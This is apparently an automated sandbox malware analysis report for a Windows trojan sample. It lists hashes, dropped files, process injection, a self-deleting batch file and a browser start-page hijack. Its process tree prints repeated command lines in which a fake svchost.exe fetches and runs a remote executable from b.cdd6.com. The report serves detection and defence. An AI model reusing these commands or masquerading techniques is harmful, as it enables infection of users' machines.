0358faf087cad9fd6ecf99491130c0fd1f699c3793a62d7ebfdfcacee60922e9

Analysis

max time kernel
145s
max time network
16s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
06/07/2024, 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
Size

47KB
MD5

286094cfaaca44ec9db1e60f4fce1988
SHA1

64ca1a4cb8d74780821a7762c515ec8487563d99
SHA256

0358faf087cad9fd6ecf99491130c0fd1f699c3793a62d7ebfdfcacee60922e9
SHA512

5b87b98b3121866bfe5948772ef39b89f66f5907168496d98beb9c98ddff4c3aed199c71a3a477877f11ee7b25a12e9b3ec69e6e033262c3b0a69a377e441a3e
SSDEEP

768:ut2SmxfGgix9rKevJjrr/qT/u9/1g2bCo2KPYJ/ukJV9HNFjNE2D8Lb/Ot72B2S:o2Deg5m/qbKXeo2AsugV9tFJE2gLbWkl

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Drivers\Atieccx.sys	cmdd

Deletes itself 1 IoCs

pid	Process
2068	cmd.exe

Executes dropped EXE 20 IoCs

pid	Process
428	363safe.exe
768	svchost.exe
2712	svchost.exe
2988	svchost.exe
2640	svchost.exe
1744	cmdd
2512	svchost.exe
3008	svchost.exe
1760	svchost.exe
2380	svchost.exe
1720	svchost.exe
1528	svchost.exe
840	svchost.exe
1772	svchost.exe
2320	svchost.exe
2600	svchost.exe
1844	svchost.exe
2432	svchost.exe
2920	svchost.exe
1300	svchost.exe

Loads dropped DLL 64 IoCs

pid	Process
2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
428	363safe.exe
428	363safe.exe
768	svchost.exe
768	svchost.exe
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
768	svchost.exe
2752	WerFault.exe
2752	WerFault.exe
2752	WerFault.exe
768	svchost.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
768	svchost.exe
2948	WerFault.exe
2948	WerFault.exe
2948	WerFault.exe
2552	svchost.exe
768	svchost.exe
2340	WerFault.exe
2340	WerFault.exe
2340	WerFault.exe
768	svchost.exe
1676	WerFault.exe
1676	WerFault.exe
1676	WerFault.exe
768	svchost.exe
2372	WerFault.exe
2372	WerFault.exe
2372	WerFault.exe
768	svchost.exe
920	WerFault.exe
920	WerFault.exe
920	WerFault.exe
768	svchost.exe
2016	WerFault.exe
2016	WerFault.exe
2016	WerFault.exe
768	svchost.exe
652	WerFault.exe
652	WerFault.exe
652	WerFault.exe
768	svchost.exe
2508	WerFault.exe
2508	WerFault.exe
2508	WerFault.exe
768	svchost.exe
2396	WerFault.exe
2396	WerFault.exe
2396	WerFault.exe
768	svchost.exe
2116	WerFault.exe
2116	WerFault.exe
2116	WerFault.exe
768	svchost.exe
2252	WerFault.exe
2252	WerFault.exe
2252	WerFault.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\msfcsg.dll	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\363safe.exe	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2160 set thread context of 2552	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	44

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Downloaded Program Files\svchost.exe	svchost.exe
File created	C:\Windows\Fonts\cmdd	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
File created	C:\Windows\Fonts\svchost.exe	363safe.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
2720	2712	WerFault.exe	31
2752	2988	WerFault.exe	34
2148	2640	WerFault.exe	37
2948	2512	WerFault.exe	41
2340	3008	WerFault.exe	47
1676	1760	WerFault.exe	50
2372	2380	WerFault.exe	53
920	1720	WerFault.exe	56
2016	1528	WerFault.exe	59
652	840	WerFault.exe	62
2508	1772	WerFault.exe	65
2396	2320	WerFault.exe	68
2116	2600	WerFault.exe	71
2252	1844	WerFault.exe	74
2940	2432	WerFault.exe	77
2068	2920	WerFault.exe	80
2220	1300	WerFault.exe	83

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://luck114.com"	363safe.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
428	363safe.exe
768	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
476	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 428	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	29
PID 2160 wrote to memory of 428	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	29
PID 2160 wrote to memory of 428	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	29
PID 2160 wrote to memory of 428	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	29
PID 428 wrote to memory of 768	428	363safe.exe	30
PID 428 wrote to memory of 768	428	363safe.exe	30
PID 428 wrote to memory of 768	428	363safe.exe	30
PID 428 wrote to memory of 768	428	363safe.exe	30
PID 768 wrote to memory of 2712	768	svchost.exe	31
PID 768 wrote to memory of 2712	768	svchost.exe	31
PID 768 wrote to memory of 2712	768	svchost.exe	31
PID 768 wrote to memory of 2712	768	svchost.exe	31
PID 2712 wrote to memory of 2720	2712	svchost.exe	33
PID 2712 wrote to memory of 2720	2712	svchost.exe	33
PID 2712 wrote to memory of 2720	2712	svchost.exe	33
PID 2712 wrote to memory of 2720	2712	svchost.exe	33
PID 768 wrote to memory of 2988	768	svchost.exe	34
PID 768 wrote to memory of 2988	768	svchost.exe	34
PID 768 wrote to memory of 2988	768	svchost.exe	34
PID 768 wrote to memory of 2988	768	svchost.exe	34
PID 2988 wrote to memory of 2752	2988	svchost.exe	36
PID 2988 wrote to memory of 2752	2988	svchost.exe	36
PID 2988 wrote to memory of 2752	2988	svchost.exe	36
PID 2988 wrote to memory of 2752	2988	svchost.exe	36
PID 768 wrote to memory of 2640	768	svchost.exe	37
PID 768 wrote to memory of 2640	768	svchost.exe	37
PID 768 wrote to memory of 2640	768	svchost.exe	37
PID 768 wrote to memory of 2640	768	svchost.exe	37
PID 2640 wrote to memory of 2148	2640	svchost.exe	39
PID 2640 wrote to memory of 2148	2640	svchost.exe	39
PID 2640 wrote to memory of 2148	2640	svchost.exe	39
PID 2640 wrote to memory of 2148	2640	svchost.exe	39
PID 2160 wrote to memory of 1744	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	40
PID 2160 wrote to memory of 1744	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	40
PID 2160 wrote to memory of 1744	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	40
PID 2160 wrote to memory of 1744	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	40
PID 768 wrote to memory of 2512	768	svchost.exe	41
PID 768 wrote to memory of 2512	768	svchost.exe	41
PID 768 wrote to memory of 2512	768	svchost.exe	41
PID 768 wrote to memory of 2512	768	svchost.exe	41
PID 2512 wrote to memory of 2948	2512	svchost.exe	43
PID 2512 wrote to memory of 2948	2512	svchost.exe	43
PID 2512 wrote to memory of 2948	2512	svchost.exe	43
PID 2512 wrote to memory of 2948	2512	svchost.exe	43
PID 2160 wrote to memory of 2552	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	44
PID 2160 wrote to memory of 2552	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	44
PID 2160 wrote to memory of 2552	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	44
PID 2160 wrote to memory of 2552	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	44
PID 2160 wrote to memory of 2552	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	44
PID 2160 wrote to memory of 2068	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	45
PID 2160 wrote to memory of 2068	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	45
PID 2160 wrote to memory of 2068	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	45
PID 2160 wrote to memory of 2068	2160	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	45
PID 768 wrote to memory of 3008	768	svchost.exe	47
PID 768 wrote to memory of 3008	768	svchost.exe	47
PID 768 wrote to memory of 3008	768	svchost.exe	47
PID 768 wrote to memory of 3008	768	svchost.exe	47
PID 3008 wrote to memory of 2340	3008	svchost.exe	49
PID 3008 wrote to memory of 2340	3008	svchost.exe	49
PID 3008 wrote to memory of 2340	3008	svchost.exe	49
PID 3008 wrote to memory of 2340	3008	svchost.exe	49
PID 768 wrote to memory of 1760	768	svchost.exe	50
PID 768 wrote to memory of 1760	768	svchost.exe	50
PID 768 wrote to memory of 1760	768	svchost.exe	50

C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Windows\SysWOW64\363safe.exe
  C:\Windows\system32\363safe.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Modifies Internet Explorer start page
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Windows\Fonts\svchost.exe
    C:\Windows\Fonts\svchost.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.1 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2712
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2720
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.2 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2752
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.3 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2640
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2148
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.4 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2512
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2948
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.5 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2340
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.6 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1760
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:1676
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.7 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2380
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2372
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.8 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1720
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:920
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.9 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2016
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.10 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:840
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:652
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.11 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1772
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2508
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.12 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2320
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2396
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.13 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2600
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2116
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.14 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1844
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 84
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2252
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.15 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2432
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 84
        5⤵
        Program crash
        
        PID:2940
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.16 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2920
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 84
        5⤵
        Program crash
        
        PID:2068
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.17 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1300
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 84
        5⤵
        Program crash
        
        PID:2220
- C:\Windows\Fonts\cmdd
  C:\Windows\Fonts\cmdd
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:1744
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Loads dropped DLL
  PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c c:\DEL.bat
  2⤵
  - Deletes itself
  PID:2068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\DEL.bat

Filesize
210B

MD5
08ba533e7bb46bca4c4cd117073af9c7

SHA1
c2d7983ae7310436a3a2bab3d8d5367a02f004bd

SHA256
32f4763f3c9a3972d90bde6af847c6493a26a6f40a60d8ebdfa35dcb582d7a28

SHA512
2d5e3465b9327ffb089a377c412338bb05ba0cdbe960aa1725e85d3e830b79137d1c756b8906cdbcead8097fd833eb10e09531aa3c3a40deb281b7078ab26ce4

Download Submit
\Windows\Downloaded Program Files\svchost.exe

Filesize
3KB

MD5
d2c3349a566a814a3d793f82ad7d8a65

SHA1
66f23c6633b21702b3ea3a936358907ca35a593e

SHA256
c4bab8beb591701e6fc5b33dea445e05a02703432d88ca90d47e2c5a46e68e23

SHA512
98a8621d2c23853299f1210f626a14500b746995582d34ef362e87b7d5ae172a4ef40356b9a61ff6e1deed53c2f76d79d8c6563ecce161bde2c58bbc66d2b1ef

Download Submit
\Windows\Fonts\cmdd

Filesize
12KB

MD5
88d3a74e8f8d13584d908e8fd0f74531

SHA1
b53ddb537ba839be6190fc89cba17ca3a8234da0

SHA256
3115b1b7ef40b1e8980e673035fd150c778b5925e011e20f199772728176fbde

SHA512
bc6257420bdcd4e0d96f789c17b9adc212a30f4d0fbbeb818b64fd6c76272f4d73aa166c29d51bc047b1b4c22e5eaaea00760a1f055cc809c076d4b7e6a000c7

Download Submit
\Windows\Fonts\svchost.exe

Filesize
13KB

MD5
3ad8a2755c0c9b6ca3be26fe1f4dd473

SHA1
61d342c456861ff6f15a217d7e133b55de2c2b98

SHA256
057b6f8547660960b795734cdd63ac9100254c5691f6785cefead4b337c56dc8

SHA512
562ca318aaeb7662e109c47430259a8a59e6a5e514cbc0c234375865592d886fe973f26799ddcd79b1140a0fe66d0e9f0a992c3b6048840b0a9f7d8d3fd057a1

Download Submit
\Windows\SysWOW64\363safe.exe

Filesize
14KB

MD5
e1dda20f3fdfa4d95c9353e06dedf5af

SHA1
fc4b588837abb6b96d56f932eba3cd6d2baddd1f

SHA256
66baf9065e615cc4b2ea191e1d777091bf072d140a8fd5444f2c5ff8569bad71

SHA512
4f9edf8cf6411a483539b48616c8027bb7e01d9be194ac12324ee5fd636aef781abec31b00013cea5584267cab7db3da4a21552007a379ba0edcf5410e965fb8

Download Submit
\Windows\SysWOW64\msfcsg.dll

Filesize
18KB

MD5
f31c6c4c922c0eefd7ddfbb68308f14c

SHA1
0d2a64ff26f3d87896afe35a52353b2357ffd496

SHA256
00fcd3086ece3ed2fadea655e86992a722a79e88f8954a44d4a9ba370c629f55

SHA512
8974c66987c2e88e8d0c87b246d498e1f4fbbbc33378860eb58b9b01a95e32f525142edb15e7e90bf985a9a7f695f194b50f2e8453ce2cece6ea33def9ef7522

Download Submit
memory/2160-1-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2160-40-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2160-0-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2160-80-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2552-69-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2552-100-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download
memory/2552-120-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download
memory/2552-169-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download